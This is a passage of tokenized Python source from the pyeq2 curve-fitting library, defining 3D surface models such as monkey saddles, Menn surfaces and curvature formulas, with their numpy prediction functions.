baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . 
PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * PowX2 / numpy . square ( PowY2 + a * ( PowX2 + PowX4 ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class LipingZheng ( pyeq2 . Model_3D_BaseClass . 
Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT:1.0> ] ) , [ <NUM_LIT> , <NUM_LIT:1.0> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT> ] ) , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT> ] ) , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX_PowY21 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_PowY22 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_PowY15_15 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowX_PowY21 + b * PowX_PowY22 + c * PowX_PowY15_15 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfParaboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = <NUM_LIT> * ( a + <NUM_LIT> * numpy . power ( a , <NUM_LIT> ) * XSQPLUSYSQ ) / numpy . power ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfParaboloid_scaled ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> scale = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = scale * ( a + <NUM_LIT> * numpy . power ( a , <NUM_LIT> ) * XSQPLUSYSQ ) / numpy . power ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfWhitneysUmbrellaA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . 
PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * x_in * ( a + b * PowY2 ) / numpy . power ( PowX2 + a * ( PowY2 + PowY4 ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfWhitneysUmbrellaB ( pyeq2 . Model_3D_BaseClass . 
Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * y_in * ( a + b * PowX2 ) / pow ( PowY2 + a * ( PowX2 + PowX4 ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MennSurfaceA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . 
append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowX_4 + b * PowX_2 * y_in - c * PowY_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MennSurfaceB ( pyeq2 . Model_3D_BaseClass . 
Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY_4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowY_4 + b * PowY_2 * x_in - c * PowX_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddleA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . 
PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX_3 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = a * PowX_3 - b * x_in * PowY_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddleB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . 
append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY_3 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = a * PowY_3 - b * y_in * PowX_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddle_TransformA ( pyeq2 . Model_3D_BaseClass . 
Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> try : <EOL> temp = a * numpy . power ( c * x_in + d , <NUM_LIT> ) - b * ( c * x_in + d ) * numpy . square ( f * y_in + g ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . 
ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddle_TransformB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> try : <EOL> temp = a * numpy . 
